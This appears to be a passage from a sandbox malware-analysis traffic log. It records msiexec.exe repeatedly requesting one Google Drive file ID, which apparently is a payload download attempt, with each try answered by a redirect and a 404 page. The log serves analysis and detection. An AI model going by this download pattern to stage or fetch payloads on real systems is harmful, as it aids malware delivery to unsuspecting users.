                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-u1h6YtI4SAGV-4VKXfa3xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          23         | 192.168.2.9 | 49997       | 142.250.181.225 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:11 UTC | 459               | OUT       | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:12 UTC | 1851              | IN        | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSf_N4WPUo5YAJ8mWThTymqOGMtqHP_njZvjkK2xzPn_Iu7WDL_W-SW5cBU002hScZhgUPuF-0
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:11 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-h-GZUrZqbbbnGTH4ylVxJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:12 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 77 56 48 4f 44 65 66 53 31 48 39 34 38 6c 50 7a 45 42 54 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OwVHODefS1H948lPzEBTGQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          24         | 192.168.2.9 | 49998       | 142.250.184.206 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:12 UTC | 417               | OUT       | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:13 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:13 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-gosmIGIl9xE2QOWU88W-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          25         | 192.168.2.9 | 49999       | 142.250.181.225 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:13 UTC | 459               | OUT       | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:14 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQPYXvFopy1EDV35xLVjggWiRaibPJPFlLkCpKToddEZQzdQCc5EjamZPAL7t45eJiO
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:14 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-wMwb2b4_dp2CTiIH_Sj69A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:14 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 45 78 66 45 76 2d 71 4d 35 56 71 78 49 55 39 2d 34 36 79 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wExfEv-qM5VqxIU9-46yNw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          26         | 192.168.2.9 | 50000       | 142.250.184.206 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:15 UTC | 417               | OUT       | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:15 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:15 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-5XjBejMfc321uZU530QjcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.9 | 50001 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:16 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:16 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQf9h6ntY22_iNSNSsaR5EBSIvm1vNYKIeyUtNwbXV-xW2nmA_8bRrALcS5K28iQKp8ykInK2s
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:16 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-qqeIylw2gDuLDRuv6Vr9nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:16 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 7a 6f 7a 35 53 5a 4a 35 37 72 6a 6e 72 76 57 57 71 69 63 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-zoz5SZJ57rjnrvWWqicuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.9 | 50002 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:17 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:17 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:17 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: script-src 'nonce-pBK03dEyx4p3vxpM9mErrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.9 | 50003 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:18 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:18 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC5NNLyxqNAhcaGTyf5DrM5r6XkLOaTpfNe1PoIlkPCBaTvS94D_KUzFlkUi-i84UkH1_JMT_EU
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:18 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-7ly0QPrlCxJy_JmbxXVLsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
